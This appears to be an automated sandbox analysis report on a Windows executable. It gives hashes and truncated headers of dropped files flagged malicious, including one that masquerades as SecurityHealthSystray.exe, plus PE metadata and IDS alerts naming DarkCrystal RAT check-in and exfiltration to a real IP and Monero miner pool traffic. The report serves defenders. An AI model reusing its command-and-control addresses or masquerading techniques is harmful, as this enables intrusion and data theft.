Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\psELHGPB.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qGmlrcYy.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rVVLbyhv.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\vCoCyIOs.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9957696105830656
Encrypted:	false
SSDEEP:	48:6xJ4aPt8GM7Jt8Bs3FJsdcV4MKe27EqdvjbvqBHiOulajfqXSfbNtm:YPUPc+Vx9MpvkMcjRzNt
MD5:	A05F0BD4BACAAB457826B5B157B990EC
SHA1:	A49E1A09995F02F170A4C4EFE66B6AB802AD29E2
SHA-256:	CF97615D0AE928CD4EC16069B614A8C8451237DCE397E802209B10EDA116BC6F
SHA-512:	7F6A3AAC255A8C1F291DFCB2C1EEF5E7F652797986216055B8A32526C8B010104F820AE0801A1858CABEAA64821FC8437D14F0CAA25EF93E66B5C695CEB00563
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..f.............................'... ...@....@.. ....................................@..................................'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..p.............................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.@.......#GUID...P... ...#Blob...........WU........%3................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.999061183663955
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	VaTlw2kNGc.exe
File size:	22'154'667 bytes
MD5:	21dd41d299117fe5c556afc317f9fcbf
SHA1:	059dc993dace11614e1077fb0eb36c602ff347f1
SHA256:	a4cf3adaa9f44653f7bad93cbaebf994f398ccabf64e968b421266a7882b9a63
SHA512:	2f1704ff9632136812822f31dc484ea2e4921cb475b04575596ac8e9374eef4b006cbc963459c33102f33a44c9550bc16150dabf2a2798f27995b71bd1bb7f9e
SSDEEP:	393216:38zTb8tvKrX7QsFLVQAV/JqolX6vrN/04LaUaWYCVxysGt7G/yF7D:383ZrrXlVFlYrRDLaT4r
TLSH:	5E273325B3B919A6F87798788CD24E4EF49174760744C6DF03B18BF25FE3AF1499A280
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc.....[hc...`.Qhc...g.Ihc...f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d..

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x14000c0d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x669E0160 [Mon Jul 22 06:51:12 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	456e8615ad4320c9f54e50319a19df9c

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FD65CBAA24Ch
dec eax
add esp, 28h
jmp 00007FD65CBA9E6Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007FD65CBAA618h
test eax, eax
je 00007FD65CBAA013h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007FD65CBA9FF7h
dec eax
cmp ecx, eax
je 00007FD65CBAA006h
xor eax, eax
dec eax
cmpxchg dword ptr [0003843Ch], ecx
jne 00007FD65CBA9FE0h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007FD65CBA9FE9h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007FD65CBA9FF9h
mov byte ptr [00038425h], 00000001h
call 00007FD65CBA9745h
call 00007FD65CBAAA30h
test al, al
jne 00007FD65CBA9FF6h
xor al, al
jmp 00007FD65CBAA006h
call 00007FD65CBB753Fh
test al, al
jne 00007FD65CBA9FFBh
xor ecx, ecx
call 00007FD65CBAAA40h
jmp 00007FD65CBA9FDCh
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000383ECh], 00000000h
mov ebx, ecx
jne 00007FD65CBAA059h
cmp ecx, 01h
jnbe 00007FD65CBAA05Ch
call 00007FD65CBAA58Eh
test eax, eax
je 00007FD65CBAA01Ah
test ebx, ebx
jne 00007FD65CBAA016h
dec eax
lea ecx, dword ptr [000383D6h]
call 00007FD65CBB7332h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c76c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x49000	0xeb4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x46000	0x2208	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a000	0x768	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x39dc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39c80	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x450	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29210	0x29400	aca64598002ecff9eefbc96554edf015	False	0.5511067708333334	data	6.4784482217419175	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12642	0x12800	ec8930c34780c48df36a7fb9e2bc5cc7	False	0.5245328336148649	data	5.75078934868212	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x73d8	0xe00	d0a288978c66419b180b35f625b6dce7	False	0.13532366071428573	data	1.8378139998458343	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x46000	0x2208	0x2400	74cf3ea22e0a1756984435d6f80f7da5	False	0.4671223958333333	data	5.259201915045256	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x49000	0xeb4	0x1000	3eff7c3c169b12e5b0914bdd9a1a8712	False	0.407958984375	data	5.340564442422027	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4a000	0x768	0x800	71de9271648326ec88350e903470cf3e	False	0.5576171875	data	5.283119454571673	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x490e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.39305054151624547
RT_GROUP_ICON	0x49990	0x14	data	1.15
RT_MANIFEST	0x499a4	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, GetLastError, FormatMessageW, GetModuleFileNameW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, CreateDirectoryW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetEnvironmentStringsW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, WaitForSingleObject, Sleep, GetCurrentProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-08-02T00:07:34.734705+0200	TCP	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	49738	80	192.168.2.4	194.58.42.154
2024-08-02T00:07:10.415595+0200	TCP	2826930	ETPRO COINMINER XMR CoinMiner Usage	49740	443	192.168.2.4	45.76.89.70
2024-08-02T00:07:44.902790+0200	UDP	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	55707	53	192.168.2.4	1.1.1.1
2024-08-02T00:08:40.967219+0200	TCP	2048130	ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)	49738	80	192.168.2.4	194.58.42.154

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2024 00:08:02.587472916 CEST	49742	80	192.168.2.4	208.95.112.1
Aug 2, 2024 00:08:02.592530966 CEST	80	49742	208.95.112.1	192.168.2.4
Aug 2, 2024 00:08:02.592619896 CEST	49742	80	192.168.2.4	208.95.112.1
Aug 2, 2024 00:08:02.592679024 CEST	49742	80	192.168.2.4	208.95.112.1
Aug 2, 2024 00:08:02.597564936 CEST	80	49742	208.95.112.1	192.168.2.4
Aug 2, 2024 00:08:03.163827896 CEST	80	49742	208.95.112.1	192.168.2.4
Aug 2, 2024 00:08:03.234669924 CEST	49742	80	192.168.2.4	208.95.112.1
Aug 2, 2024 00:08:03.632692099 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:03.632738113 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:03.632901907 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:03.678659916 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:03.678689957 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.198834896 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.201767921 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.201778889 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.203339100 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.203524113 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.204282045 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.204375029 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.204554081 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.204653025 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.204678059 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.205451012 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.205487967 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.209460974 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.209505081 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213454008 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213484049 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213506937 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213519096 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213583946 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213597059 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213610888 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213628054 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213674068 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213691950 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213694096 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213701010 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213704109 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213711023 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213716030 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213722944 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213751078 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213762999 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213803053 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213812113 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213828087 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213840961 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213862896 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213871956 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213882923 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213896990 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213929892 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213948965 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213968992 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213977098 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.213989019 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.213999987 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.214024067 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.214035988 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.214060068 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.214073896 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.214086056 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.214102983 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.214131117 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.214140892 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.214162111 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.214174986 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.214189053 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.214200974 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.214231968 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.214266062 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.214284897 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.214299917 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.224395037 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.228104115 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.228132963 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.228147030 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.228153944 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.228174925 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.228188038 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.228197098 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.228202105 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.228225946 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.228225946 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.228231907 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.228250027 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.228257895 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.228279114 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.228286982 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.228301048 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.228347063 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.228367090 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.228411913 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.228423119 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.229589939 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.906225920 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.906375885 CEST	443	49743	162.159.138.232	192.168.2.4
Aug 2, 2024 00:08:04.906565905 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:04.907308102 CEST	49743	443	192.168.2.4	162.159.138.232
Aug 2, 2024 00:08:05.270561934 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.270617962 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.270804882 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.302113056 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.302169085 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.959857941 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.966329098 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.966387987 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.968072891 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.968151093 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.968797922 CEST	49745	443	192.168.2.4	149.154.167.220
